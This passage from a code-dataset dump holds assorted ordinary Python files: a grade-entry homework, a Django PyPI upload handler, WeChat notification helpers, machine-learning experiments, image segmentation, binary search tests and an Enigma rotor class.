gradeList\n}\n\naverage = list()\n\nfor i in range(5):\n x = input(\"%d. Öğrencinin ismini giriniz: \" % (i+1))\n y = input(\"%d. Öğrencinin soy ismini giriniz: \" % (i+1))\n\n while True:\n try:\n z = int(input(\"%d. Öğrencinin vize notu giriniz: \" % (i+1)))\n if z <= 0 or 100 <= z:\n print(\"1 ile 100 arasında bir değer girmelisiniz\")\n elif isinstance(z,int):\n break\n except ValueError:\n print(\"1 ile 100 arasında bir int değer girmelisiniz\")\n\n while True:\n try:\n t = int(input(\"%d. Öğrencinin final notu giriniz: \" % (i+1)))\n if t <= 0 or 100 <= t:\n print(\"1 ile 100 arasında bir değer girmelisiniz\")\n elif isinstance(t,int):\n break\n except ValueError:\n print(\"1 ile 100 arasında bir int değer girmelisiniz\")\n\n while True:\n try:\n w = int(input(\"%d. Öğrencinin ödev notu giriniz: \" % (i+1)))\n if w <= 0 or 100 <= w:\n print(\"1 ile 100 arasında bir değer girmelisiniz\")\n elif isinstance(w,int):\n break\n except ValueError:\n print(\"1 ile 100 arasında bir int değer girmelisiniz\")\n\n tempStudent=[]\n tempStudentGrade=[]\n\n tempStudent.append(x)\n tempStudent.append(y)\n tempStudentGrade.append(z)\n tempStudentGrade.append(t)\n tempStudentGrade.append(w)\n\n gradeList.append(tempStudentGrade)\n studentList.append(tempStudent)\n average.append(int(sum(studentInfo[\"studentGrade\"][i])/3))\n \nprint(studentInfo)\nprint(\"Tebrikler %s\" % studentList[average.index(max(average))][0])","sub_path":"Homeworks/HW2.py","file_name":"HW2.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"214968423","text":"import hashlib\nimport json\nimport logging\n\nfrom django.conf import settings\nfrom django.http.multipartparser import MultiPartParser\n\nfrom pypi.models import Package\nimport pypi.metadata\n\n\nlog = logging.getLogger(__name__)\n\n\nclass CRLFParts(object):\n \"\"\"A file-like object that wraps a file-like object, turning LF-delimited\n MIME headers into CRLF-delimited ones\n \"\"\"\n def __init__(self, stream, boundary):\n self.boundary = boundary\n self.blocksize = 4096\n assert len(boundary) + 3 < self.blocksize\n\n self._buf = [] # For read()\n self._iter = self._header_transformer(self._line_iter(stream))\n\n def read(self, size=-1):\n \"\"\"Read like a file\"\"\"\n if not self._buf:\n self._buf.append(next(self._iter, b''))\n if len(self._buf[0]) < size or size < 0:\n return self._buf.pop(0)\n block = self._buf.pop(0)\n self._buf.insert(0, block[size:])\n return block[:size]\n\n def _line_iter(self, stream):\n \"\"\"Iterate lines from a stream, or blocks if line length is greater\n than blocksize.\n Not terribly efficient or inefficient...\n \"\"\"\n buf = b''\n while True:\n if len(buf) < self.blocksize:\n buf += stream.read(self.blocksize - len(buf))\n if not buf:\n break\n i = buf.find(b'\\n')\n if i < 0:\n yield buf\n buf = b''\n else:\n yield buf[:i + 1]\n buf = buf[i + 1:]\n\n def _header_transformer(self, lines):\n \"\"\"Transform LF in MIME headers to CRLF\"\"\"\n needle = b'--%s\\n' % self.boundary\n in_header = False\n for line in lines:\n if line == needle:\n in_header = True\n if in_header:\n assert line[-1] == b'\\n'\n line = line[:-1] + b'\\r\\n'\n if line == b'\\r\\n':\n in_header = False\n yield line\n\n\nclass InvalidUpload(Exception):\n pass\n\n\nclass ReplacementDenied(Exception):\n pass\n\n\ndef process(request):\n # Django doesn't like the LF line endings on the MIME headers that\n # distutils will give us.\n boundary = request.META['CONTENT_TYPE'].split('boundary=', 1)[1].encode()\n parser = MultiPartParser(request.META, CRLFParts(request, boundary),\n request.upload_handlers, request.encoding)\n post, files = parser.parse()\n\n # Historically, the protocol field was mis-named, but twine corrected this\n protocol_version = post.get(\n 'protocol_version', post.get('protcol_version', None))\n if protocol_version != '1':\n raise InvalidUpload('Missing/Invalid protocol_version')\n\n if post[':action'] != 'file_upload':\n raise InvalidUpload('The only supported actions are uploads')\n\n if '/' in files['content'].name:\n raise InvalidUpload('Invalid filename')\n\n if post['filetype'] not in getattr(settings, 'PYPI_ALLOWED_UPLOAD_TYPES',\n ('sdist',)):\n raise InvalidUpload('File type disallowed by policy')\n\n metadata = parse_metadata(post)\n\n if md5sum(files['content']) != post['md5_digest']:\n raise InvalidUpload(\"MD5 digest doesn't match content\")\n\n name = post['name']\n version = post['version']\n\n package, _ = Package.objects.get_or_create(name=name)\n release, created = package.releases.get_or_create(version=version)\n\n # Update metadata\n release.metadata = json.dumps(metadata)\n release.save()\n\n distribution = release.distributions.filter(filetype=post['filetype'],\n pyversion=post['pyversion'])\n if distribution.exists():\n if not getattr(settings, 'PYPI_ALLOW_REPLACEMENT', True):\n raise ReplacementDenied(\n 'A distribution with the same name and version is already '\n 'present in the repository')\n distribution = distribution[0]\n distribution.delete()\n # The deletion could have garbage collected the Package and Release\n package, _ = Package.objects.get_or_create(name=name)\n release, created = package.releases.get_or_create(version=version)\n\n distribution = release.distributions.create(filetype=post['filetype'],\n pyversion=post['pyversion'],\n md5_digest=post['md5_digest'],\n content=files['content'])\n distribution.save()\n\n\ndef parse_metadata(post_data):\n \"\"\"Parse the uploaded metadata, and return a cleaned up dictionary\"\"\"\n metadata_version = str(post_data['metadata_version'])\n\n try:\n fields = pypi.metadata.metadata_fields(metadata_version)\n except ValueError as e:\n raise InvalidUpload(e)\n\n metadata = {}\n for key in sorted(fields['fields']):\n post_key = key.lower().replace('-', '_')\n if key in fields['required'] and post_key not in post_data:\n raise InvalidUpload('Missing %s, required for Metadata-Version %s'\n % (key, metadata_version))\n\n if post_data.getlist(post_key, []) in ([u'UNKNOWN'], []):\n continue\n\n if key in fields['multivalued']:\n metadata[key] = post_data.getlist(post_key)\n else:\n metadata[key] = post_data.get(post_key)\n\n # Normalise CSV fields to multi-valued\n if key in fields['csv']:\n if key in fields['multivalued']:\n metadata[key] = ','.join(metadata[key])\n metadata[key] = metadata[key].replace(';', ',')\n metadata[key] = [value.strip()\n for value in metadata[key].split(',')\n if value.strip()]\n\n return metadata\n\n\ndef md5sum(file_):\n \"\"\"MD5Sum a UploadedFile\"\"\"\n md5 = hashlib.md5()\n for chunk in file_.chunks():\n md5.update(chunk)\n return md5.hexdigest()\n","sub_path":"yolapi/pypi/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":6035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"519902564","text":"# coding: utf-8\nimport datetime\n\nfrom market.models import Channel\nfrom utils.future_help import run_on_executor\nfrom micro_service.service import WeixinServer\n\n\ndef get_channel_info(user_instance):\n if user_instance.channel_id and Channel.objects.filter(id=user_instance.channel_id).exists():\n channel_instance = Channel.objects.get(id=user_instance.channel_id)\n channel = {\n 'id': channel_instance.id,\n 'name': channel_instance.name,\n 'create_time': channel_instance.create_time\n }\n else:\n # channel_instance = Channel.objects.filter(userchannel__openid=user_instance.openid).first()\n # if channel_instance:\n # channel = {\n # 'id': channel_instance.id,\n # 'name': channel_instance.name,\n # 'create_time': channel_instance.create_time\n # }\n # else:\n channel = None\n\n return channel\n\n\n@run_on_executor\ndef order_confirmed_template_message(openid, name, confirm_status, remark):\n \"\"\"订单确认模板消息\"\"\"\n template_id = 'fOjcVFfvIL2XBGif0uI2-2SVZGMRI7foq3zYCIK4c8U'\n data_template = {\n 'first': '您的订单有新的审核反馈啦',\n 'keyword1': '', # 姓名\n 'keyword2': '', # 日期\n 'keyword3': '', # 审核结果\n 'remark': '' # remark\n }\n data = data_template\n data['keyword1'] = name\n data['keyword2'] = datetime.datetime.now().strftime('%Y-%m-%d: %H:%M:%S')\n data['keyword3'] = confirm_status\n data['remark'] = remark\n url = ''\n WeixinServer.send_template_message(openid, template_id, url, **data)\n return\n\n\n@run_on_executor\ndef create_course_template_message(openid, user_name, sales_man_name, project_name, course_name, course_time, address):\n \"\"\"创建课程通知消息\"\"\"\n templates_id = 'BmuykpTx7GVgJMmc33Wmh54ukw_s_sx3j9H2gum5Mww'\n url = ''\n data_template = {\n 'first': '',\n 'keyword1': '',\n 'keyword2': '',\n 'remark': ''\n }\n data = data_template\n data['first'] = 'Hi【%s】,你的课程顾问【%s】刚刚为你的项目【%s】注册了课程\\n' % (user_name, sales_man_name, project_name)\n data['keyword1'] = course_name\n data['keyword2'] = course_time\n data['remark'] = '上课地点: %s\\n\\n请尽快确认所选课程,若所选课程有误,请立即与您的专属课程顾问联系,更改课程!' % address\n WeixinServer.send_template_message(openid, templates_id, url, **data)\n return","sub_path":"StuSystem/StuSystem/admin/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"178171834","text":"# -*- coding: utf-8 -*-\n#\n# Author: Jörg Schäfer (2010-2016), \n# Frankfurt University of Applied Sciences# FB2, Computer Science and Engineering, Distributed Systems\n# \n# For educational purpose only (not necessarily very pythonic) \n# Requires python 2.7 or higher (3.0 compatible)\n#\n# -----------------------------------------------------------------------------\n# Computes growth related to complexity factors\n# -----------------------------------------------------------------------------\n#\n\nfrom math import *\n\ndef format(str):\n return str.replace(\"e-\", \"\\\\times 10^{-\").replace(\"e+\", \"\\\\times 10^{\").replace(\"'\", \"\")\n \n \ngrowth=((\"n\", lambda x: x),\n (\"n \\\\log n\", lambda x: x*log(x)),\n (\"n^2\", lambda x: x*x),\n (\"2^{\\\\sqrt(n)}\", lambda x: 2**sqrt(x)),\n (\"2^n\", lambda x: 2**x),\n (\"n!\", lambda x: float(factorial(x))))\n\nn = (10, 20, 30, 40, 50)\nmips= 10**9\nprint(\"%autogenerated from growth.py do not edit!\")\nfor row in growth:\n print(\"$f(n)=%s$& $%s}$\\\\cr\" % (row[0], \"}$&$\".join(map(format, [\"%.1e'\" % x for x in [x/mips for x in list(map(row[1], [float(x) for x in n]))]]))))\n","sub_path":"2_Semester/Algorithmen_Datentypen/precompiled/Python-algorithms/growth.py","file_name":"growth.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"15407034","text":"import numpy as np\nimport matplotlib.pyplot as plt\n#from pyESN import ESN\nimport ESN\nimport ESN2\n# import ESNold as ESN\n# import reservoir as ESN\nfrom sklearn.model_selection import GridSearchCV\n\ndef set_seed(seed=None):\n \"\"\"Making the seed (for random values) variable if None\"\"\"\n\n # Set the seed\n if seed is None:\n import time\n seed = int((time.time()*10**6) % 4294967295)\n try:\n np.random.seed(seed)\n except Exception as e:\n print( \"!!! WARNING !!!: Seed was not set correctly.\")\n print( \"!!! Seed that we tried to use: \"+str(seed))\n print( \"!!! Error message: \"+str(e))\n seed = None\n print( \"Seed used for random values:\", seed)\n return seed\n\n## Set a particular seed for the random generator (for example seed = 42), or use a \"random\" one (seed = None)\n# NB: reservoir performances should be averaged accross at least 30 random instances (with the same set of parameters)\nseed = 42 #None #42\n\nset_seed(seed) #random.seed(seed)\n\n## load the data and select which parts are used for 'warming', 'training' and 'testing' the reservoir\n# 30 seems to be enough for initLen with leak_rate=0.3 and reservoir size (resSize) = 300\ninitLen = 1000 # number of time steps during which internal activations are washed-out during training\n# we consider trainLen including the warming-up period (i.e. internal activations that are washed-out when training)\ntrainLen = initLen + 3000 # number of time steps during which we train the network\ntestLen = 4000 # number of time steps during which we test/run the network\nminmse=100\ndata = np.loadtxt('2.txt')\nprint( \"data dimensions\", data.shape)\n\n\n\n# generate the ESN reservoir\n# inSize = outSize = 1 #input/output dimension\n# resSize = 300 #reservoir size (for prediction)\n# resSize = 1000 #reservoir size (for generation)\n# spectral_radius = 1.25\n# input_scaling = 1.\ndef getpap(list1):\n list2=[]\n a=list1[0]\n while a<=list1[1]:\n list2.append(a)\n a=a+list1[2]\n return list2\nn_reservoir_op =getpap([100,500,100])\nleak_rate_op=getpap([0.1,0.5,0.1])\nproba_non_zero_connec_W_op=getpap([0.1,0.5,0.1])\nregularization_coef_op=[1e-4,1e-5,1e-6,1e-7,1e-8]\nn_inputs =25\ninput_bias = True # add a constant input to 1\nn_outputs = 25\n#n_reservoir =300 # number of recurrent units300\n#leak_rate = 0.3 # leaking rate (=1/time_constant_of_neurons)\nspectral_radius = 1.25 # Scaling of recurrent matrix\ninput_scaling = 1. # Scaling of input matrix\n#proba_non_zero_connec_W = 0.2 # Sparsity of recurrent matrix: Perceptage of non-zero connections in W matrix\nproba_non_zero_connec_Win = 1. # Sparsity of input matrix\nproba_non_zero_connec_Wfb = 1. # Sparsity of feedback matrix\n#regularization_coef = 1e-5 #None # regularization coefficient, if None, pseudo-inverse is use instead of ridge regression\n# out_func_activation = lambda x: x\n\n\n\nfor i in range(len(n_reservoir_op)):\n for j in range(len(leak_rate_op)):\n for t in range(len(proba_non_zero_connec_W_op)):\n for r in range(len(regularization_coef_op)):\n n_reservoir=n_reservoir_op[i]\n leak_rate=leak_rate_op[j]\n proba_non_zero_connec_W=proba_non_zero_connec_W_op[t]\n regularization_coef=regularization_coef_op[r]\n N = n_reservoir # 100\n dim_inp = n_inputs # 26\n ## Generating random weight matrices with toolbox methods\n # import mat_gen\n # W = mat_gen.generate_internal_weights(N=self.N, spectral_radius=self.sr, proba=self.w_proba,\n # # seed=seed, verbose=verbose)\n # Wstd=self.Wstd, seed=current_seed, verbose=verbose)\n # Win = mat_gen.generate_input_weights(nbr_neuron=self.N, dim_input=self.stim_sent_train[0].shape[1], #TODO stim_sent_train[0].shape\n # input_scaling=self.iss, proba=self.w_in_proba, input_bias=self.input_bias, seed=current_seed, verbose=verbose)\n # Wfb = mat_gen.generate_input_weights(nbr_neuron=self.N, dim_input=self.dim_output, #TODO stim_sent_train[0].shape\n # input_scaling=self.fbscale, proba=self.fbproba, input_bias=None, seed=current_seed, verbose=verbose)\n\n ### Generating random weight matrices with custom method\n line = np.arange(0, trainLen + testLen, 1)\n W = np.random.rand(N, N) - 0.5\n if input_bias:\n Win = np.random.rand(N, dim_inp + 1) - 0.5\n else:\n Win = np.random.rand(N, dim_inp) - 0.5\n Wfb = np.random.rand(N, n_outputs) - 0.5\n\n # # Mantas way\n # Win = (np.random.rand(N,1+dim_inp)-0.5) * input_scaling\n # W = np.random.rand(N,N)-0.5\n\n ## delete the fraction of connections given the sparsity (i.e. proba of non-zero connections):\n mask = np.random.rand(N, N) # create a mask Uniform[0;1]\n W[mask > proba_non_zero_connec_W] = 0 # set to zero some connections given by the mask\n mask = np.random.rand(N, Win.shape[1])\n Win[mask > proba_non_zero_connec_Win] = 0\n # mask = np.random.rand(N,Wfb.shape[1])\n # Wfb[mask > proba_non_zero_connec_Wfb] = 0\n\n ## SCALING of matrices\n # scaling of input matrix\n Win = Win * input_scaling\n # scaling of recurrent matrix\n # compute the spectral radius of these weights:\n print('Computing spectral radius...')\n original_spectral_radius = np.max(np.abs(np.linalg.eigvals(W)))\n # TODO: check if this operation is quicker: max(abs(linalg.eig(W)[0])) #from scipy import linalg\n print(\"default spectral radius before scaling:\", original_spectral_radius)\n # rescale them to reach the requested spectral radius:\n W = W * (spectral_radius / original_spectral_radius)\n print(\"spectral radius after scaling\", np.max(np.abs(np.linalg.eigvals(W))))\n\n reservoir = ESN.ESN(lr=leak_rate, W=W, Win=Win, input_bias=input_bias, ridge=regularization_coef,\n Wfb=None, fbfunc=None)\n\n \"\"\"mean=np.mean(data,0)\n var=np.var(data,0)\n print(mean)\n print(var)\n for i in range(len(mean)):\n data[:,i]=data[:,i]-mean[i]\n data[:,i]=data[:,i]/var[i]\n print(data)\"\"\"\n\n train_in = data[0:trainLen, :]\n train_out = data[1:trainLen + 1, :]\n test_in = data[trainLen:trainLen + testLen, :]\n test_out = data[trainLen + 1:trainLen + testLen + 1, :]\n print(train_in.shape)\n\n # train_in, train_out = np.vstack([data[0:trainLen],data[0:trainLen]]), np.vstack([data[0+1:trainLen+1], data[0+1:trainLen+1]])\n # test_in, test_out = np.vstack([data[trainLen:trainLen+testLen],data[trainLen:trainLen+testLen]]) , np.vstack([data[trainLen+1:trainLen+testLen+1],data[trainLen+1:trainLen+testLen+1]])\n\n # train_in, train_out = np.atleast_2d(data[0:trainLen]), np.atleast_2d(data[0+1:trainLen+1])\n # test_in, test_out = np.atleast_2d(data[trainLen:trainLen+testLen]), np.atleast_2d(data[trainLen+1:trainLen+testLen+1])\n\n # rearange inputs in correct dimensions\n # train_in, train_out = train_in.T, train_out.T\n # test_in, test_out = test_in.T, test_out.T\n\n # Dimensions of input/output train/test data\n print(\"train_in, train_out dimensions\", train_in.shape, train_out.shape)\n print(\"test_in, test_out dimensions\", test_in.shape, test_out.shape)\n\n internal_trained = reservoir.train(inputs=[train_in, ], teachers=[train_out, ],\n wash_nr_time_step=initLen, verbose=False)\n # print(internal_trained)\n output_pred, internal_pred = reservoir.run(inputs=[test_in, ], reset_state=False)\n\n errorLen = len(test_out[:]) # testLen #2000\n\n\n mse = np.mean((test_out[:] - output_pred[0]) ** 2)\n if mse type : binop , leaf : + , children = [node a, node b] (Here, if a is number, node a is 5) form. If string, 6))\n\t\t\t2) if s do e1 else e2 => type : ifelse , leaf : if , children = [node s, node e1, node e2]\n\t\t\t3) a = 2 => type : assign , leaf : = , children = [node a, node 2]\n\t\t\t4) print(e) => type : function , leaf : print , children = node e\n\t\t\t5) 1 => type : number , leaf : number , children = node 1\n\t\t\t6) a => type : name , leaf : name , children = node a\n\t\t\t\n\t\t\t* Note that leaf should be string and children can be list or string according to whether it is the last tree or not. You should make\n\t\t\ttake care of children is list or not to make \"do\" method.\n\t\t'''\n\t\t\n\t\tself.type = type\n\t\t\n\t\t# make children list or object\n\t\tif children:\n\t\t\tself.children = children\n\t\telse:\n\t\t\tself.children = 0.0\n\t\t\t\n\t\tself.leaf = leaf\n\t\n\t# This method is called when we type just object on console. For test\n\tdef __str__(self):\n\t\treturn str([self.leaf, self.children])\n\t\t\n\t# To test the node tree. If you want to see node tree structure, make showNodeTree True\n\tdef traverse(self):\n\t\tchildTree = []\n\t\tif isinstance(self.children, types.ListType):\n\t\t\tfor child in self.children:\n\t\t\t\tif child.__doc__ == \"Simple Node\":\n\t\t\t\t\tchildTree.append(child.traverse())\n\t\t\t\telse:\n\t\t\t\t\tchildTree.append(child)\n\t\telse:\n\t\t\tif self.children.__doc__ == \"Simple Node\":\n\t\t\t\tchildTree = self.children.traverse()\n\t\t\telse:\n\t\t\t\tchildTree = self.children\n\t\treturn [self.leaf, childTree]\n\n#-----------------------------------------------------------------------------#","sub_path":"SWIM-Executables/Unix/pyinstaller-2.0/swim3/AST.py","file_name":"AST.py","file_ext":"py","file_size_in_byte":3857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"623360728","text":"#scratch.py\nfrom bashplotlib.scatterplot import plot_scatter\n\nx_coords = [-10,20,30]\ny_coords = [-10,20,30]\nwidth = 10\nchar = 'x'\ncolor = 'default'\ntitle = 'My Test Graph'\n\nplot_scatter(\n None,\n x_coords,\n y_coords,\n width,\n char,\n color,\n title)","sub_path":"scratch.py","file_name":"scratch.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"564951051","text":"#\nfrom PIL import Image\nimport cv2\nimport numpy as np\nimport sklearn\nfrom sklearn import mixture\nfrom sklearn.cluster import KMeans\n\ndef segmentByClustering (rgbImage, colorSpace, clusteringMethod, numberOfClusters ):\n \n import numpy as np\n #determine if xy is required\n space=colorSpace.split(\"+\")\n leng=len(space)\n w ,h = rgbImage.shape[:2]\n\t#generate XY matrix\n if leng == 2:\n import numpy as np\n x=range(w)\n xmat= np.repeat(x,h)\n xmat=xmat.reshape(w,h)\n xmat=np.uint8(xmat)\n y=range(h)\n ymat= np.repeat(y,w)\n ymat=ymat.reshape(w,h)\n ymat=np.uint8(ymat)\n colorSpace=space[0]\n\t#change image to the specified color space\n def RGB(rgbImage):\n newImage = rgbImage\n return newImage\n def HSV (rgbImage):\n import cv2\n newImage = cv2.cvtColor(rgbImage, cv2.COLOR_BGR2HSV)\n return newImage\n def LAB (rgbImage):\n import skimage\n newImage = cv2.cvtColor(rgbImage, cv2.COLOR_BGR2LAB)\n return newImage\n\t#Switch for color space\n S_color = {\n \"rgb\" : RGB,\n \"lab\" : LAB,\n\t\t\"hsv\" : HSV\n\t}\n func = S_color.get(colorSpace)\n \n newImage=func(rgbImage)\n \n\t#aply XY matrix if needed\n if leng == 2:\n \n temp=np.ndarray(shape=(w,h,5))\n temp[:,:,0]=newImage[:,:,0]\n temp[:,:,1]=newImage[:,:,1]\n temp[:,:,2]=newImage[:,:,2]\n temp[:,:,3]=xmat\n temp[:,:,4]=ymat\n newImage=temp\n \n indx= 0\n size=newImage.shape\n \n if leng ==2: \n \n repMat=np.zeros((size[0]*size[1],5))\n else:\n repMat=np.zeros((size[0]*size[1],3))\n \n for i in range(size[0]):\n for j in range(size[1]):\n \n\n if leng ==2:\n \n i1= (newImage[i,j,3]/(255-0))\n j1= (newImage[i,j,4]/(255-0))\n repMat[indx]= [newImage[i,j,0],newImage[i,j,1],newImage[i,j,2], i1,j1]\n indx=indx+1\n \n else:\n \n repMat[indx]= [newImage[i,j,0],newImage[i,j,1],newImage[i,j,2]]\n \n k= numberOfClusters\n \n if clusteringMethod == 'kmeans':\n \n kmeans = KMeans(n_clusters=k).fit(repMat)\n labels=kmeans.labels_\n labels= np.reshape(labels,(size[0],size[1]))\n seg= labels\n \n elif clusteringMethod == 'gmm': \n \n gmm = mixture.GaussianMixture(n_components=k).fit(repMat,y='None')\n labels = gmm.predict(repMat)\n labels= np.reshape(labels,(size[0],size[1]))\n seg= labels\n \n elif clusteringMethod == 'hierarchical':\n \n import sklearn.cluster\n from sklearn.cluster import AgglomerativeClustering \n\n cluster = AgglomerativeClustering(n_clusters=k, affinity='euclidean', linkage='ward').fit(repMat) \n labels=cluster.labels_\n labels= np.reshape(labels,(size[0],size[1]))\n seg=labels\n \n elif clusteringMethod == 'watershed':\n \n a=2\n \n \n \n \n \n return seg\n","sub_path":"06-Segmentation/seg.py","file_name":"seg.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"300325343","text":"from random import randint\n\n\ndef binary_search(sorted_list, key):\n \"\"\"Search for key in sorted_list and returns index if key is found\n or (-insertion_point + 1) otherwise.\n Time complexity: O(log(n))\n \"\"\"\n\n lower, upper = 0, len(sorted_list) - 1\n while lower <= upper:\n mid = lower + (upper - lower) / 2\n if sorted_list[mid] == key:\n return mid\n elif sorted_list[mid] < key:\n lower = mid + 1\n elif sorted_list[mid] > key:\n upper = mid - 1\n return -lower - 1\n\n\ndef binary_search_recursive(sorted_list, key):\n \"\"\"Search for key in sorted_list and returns index if key is found\n or (-insertion_point + 1) otherwise; may stack overflow!\n Time complexity: O(log(n))\n \"\"\"\n\n def bs_in_range(sorted_list, key, lower, upper):\n if (upper < lower):\n return -lower - 1\n mid = lower + (upper - lower) / 2\n if sorted_list[mid] == key:\n return mid\n elif sorted_list[mid] < key:\n return bs_in_range(sorted_list, key, mid + 1, upper)\n else:\n return bs_in_range(sorted_list, key, lower, mid - 1)\n\n return bs_in_range(sorted_list, key, 0, len(sorted_list) - 1)\n\n\ndef binary_search_lowest_occurence(sorted_list, key):\n \"\"\"Search for key in sorted_list and returns lowest index if key is found\n or (-insertion_point + 1) otherwise.\n Time complexity: O(log(n))\n \"\"\"\n\n lower, upper, res = 0, len(sorted_list) - 1, -1\n while lower <= upper:\n mid = lower + (upper - lower) / 2\n if sorted_list[mid] == key:\n res = mid\n upper = mid - 1\n elif sorted_list[mid] < key:\n lower = mid + 1\n elif sorted_list[mid] > key:\n upper = mid - 1\n return res if res >= 0 else -lower - 1\n\n\ndef binary_search_highest_occurence(sorted_list, key):\n \"\"\"Search for key in sorted_list and returns highest index if key is found\n or (-insertion_point + 1) otherwise.\n Time complexity: O(log(n))\n \"\"\"\n\n lower, upper, res = 0, len(sorted_list) - 1, -1\n while lower <= upper:\n mid = lower + (upper - lower) / 2\n if sorted_list[mid] == key:\n res = mid\n lower = mid + 1\n elif sorted_list[mid] < key:\n lower = mid + 1\n elif sorted_list[mid] > key:\n upper = mid - 1\n return res if res >= 0 else -lower - 1\n\n\n# Tests\n\ndef binary_search_test_random(bs_func, occurence=None):\n print(\"Testing binary search \" + bs_func.__name__)\n n = 10\n sorted_array = _generate_sorted_array(n, k=10)\n keys = (randint(0, n) for _ in range(int(n / 4)))\n for key in keys:\n res = bs_func(sorted_array, key)\n\n # key not found\n if res < 0:\n msg = _msg(\"key was in array, but should not have been\",\n key=key, res=res, array=sorted_array)\n assert key not in sorted_array, msg\n\n insertion_offset = -(res + 1)\n _insert(sorted_array, insertion_offset, key)\n msg = _msg(\"key would have been inserted in wrong place\",\n key=key, res=res,\n expected_array_after_insertion=sorted(sorted_array),\n array_after_insertion=sorted_array)\n assert sorted(sorted_array) == sorted_array, msg\n\n # key found\n else:\n msg = _msg(\"Key does not match\",\n key=key, res=res, array=sorted_array)\n assert key == sorted_array[res], msg\n\n if occurence == 'lowest':\n exc = sorted_array.index(key)\n msg = _msg(\"Failed to find lowest occurence\",\n exc=exc, res=res, key=key, array=sorted_array)\n assert exc == res, msg\n\n elif occurence == 'highest':\n exc = len(sorted_array) - sorted_array[::-1].index(key) - 1\n msg = _msg(\"Failed to find highest occurence\",\n exc=exc, res=res, key=key, array=sorted_array)\n assert exc == res, msg\n\n\ndef test_repeat(test_func, repeat):\n for i in range(repeat):\n print(\"Trial number: {}\").format(i)\n test_func()\n print\n\n\ndef _insert(array, offset, value):\n array.extend([0])\n for idx in reversed(range(offset + 1, len(array))):\n array[idx] = array[idx - 1]\n array[offset] = value\n\n\ndef _generate_sorted_array(n, k=1):\n return sorted(\n i for _ in range(n) for i in (randint(1, k) * [randint(0, n)])\n )\n\n\ndef _msg(msg, **kwargs):\n for key in kwargs:\n msg += '\\n'\n msg += key + \" = {}\".format(kwargs[key])\n return msg\n\n\nif __name__ == \"__main__\":\n n = 100\n test_repeat(lambda: binary_search_test_random(binary_search), n)\n test_repeat(lambda: binary_search_test_random(binary_search_recursive), n)\n test_repeat(\n lambda: binary_search_test_random(binary_search_lowest_occurence,\n occurence='lowest'), n\n )\n test_repeat(\n lambda: binary_search_test_random(binary_search_highest_occurence,\n occurence='highest'), n\n )\n","sub_path":"basic/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":5189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"587392971","text":"import logging\nimport multiprocessing\n\nimport numpy as np\n\nimport sklearn.datasets\nimport sklearn.metrics\n\nfrom autosklearn.classification import AutoSklearnClassifier\nfrom autosklearn.constants import *\n\ntmp_folder = '/tmp/autoslearn_example_tmp'\noutput_folder = '/tmp/autosklearn_example_out'\n\n\ndef spawn_classifier(seed, dataset_name):\n digits = sklearn.datasets.load_digits()\n X = digits.data\n y = digits.target\n indices = np.arange(X.shape[0])\n np.random.shuffle(indices)\n X = X[indices]\n y = y[indices]\n X_train = X[:1000]\n y_train = y[:1000]\n X_test = X[1000:]\n y_test = y[1000:]\n\n automl = AutoSklearnClassifier(time_left_for_this_task=60,\n per_run_time_limit=60,\n ml_memory_limit=1024,\n shared_mode=True,\n tmp_folder=tmp_folder,\n output_folder=output_folder,\n delete_tmp_folder_after_terminate=False,\n ensemble_size=0,\n initial_configurations_via_metalearning=0,\n seed=seed)\n automl.fit(X_train, y_train, dataset_name=dataset_name)\n\nif __name__ == '__main__':\n processes = []\n for i in range(2, 6):\n p = multiprocessing.Process(target=spawn_classifier, args=(i, 'digits'))\n p.start()\n processes.append(p)\n for p in processes:\n p.join()\n\n digits = sklearn.datasets.load_digits()\n X = digits.data\n y = digits.target\n indices = np.arange(X.shape[0])\n np.random.shuffle(indices)\n X = X[indices]\n y = y[indices]\n X_train = X[:1000]\n y_train = y[:1000]\n X_test = X[1000:]\n y_test = y[1000:]\n\n print('Starting to build an ensemble!')\n automl = AutoSklearnClassifier(time_left_for_this_task=15,\n per_run_time_limit=15,\n ml_memory_limit=1024,\n shared_mode=True,\n ensemble_size=50,\n ensemble_nbest=200,\n tmp_folder=tmp_folder,\n output_folder=output_folder,\n initial_configurations_via_metalearning=0,\n seed=1)\n\n # Both the ensemble_size and ensemble_nbest parameters can be changed later\n automl.fit_ensemble(task=MULTICLASS_CLASSIFICATION,\n metric=ACC_METRIC,\n precision='32',\n dataset_name='digits',\n ensemble_size=10,\n ensemble_nbest=10)\n\n predictions = automl.predict(X_test)\n print(automl.show_models())\n print(\"Accuracy score\", sklearn.metrics.accuracy_score(y_test, predictions))","sub_path":"example/example_parallel.py","file_name":"example_parallel.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"89367239","text":"from collections import deque\nfrom core_enigma.settings.settings import LETTERS, NUMBERS\nfrom core_enigma.scrambler.validators import WiringCharactersDescriptor\n\n\nclass RotorInputIndexError(Exception):\n def __init__(self, index):\n \"\"\"\n\n \"\"\"\n msg = (\n f\"Reflector index error!. {index} is out of range. \"\n f\"Must be in range 0 to 25\")\n super().__init__(msg)\n\n\nclass RotorCore:\n\n _wire_chars = WiringCharactersDescriptor(self_wired=True)\n\n def __init__(self, rotor, device_id, wiring_characters, charset_flag='L'):\n \"\"\"\n\n \"\"\"\n self._rotor = rotor\n self._device_id = device_id\n self._wire_chars = wiring_characters\n self._charset_flag = None\n self._charset = None\n self.character_set_flag = charset_flag\n self._lh_translation_map = {}\n self._rh_translation_map = {}\n self._make_translation_maps()\n\n def 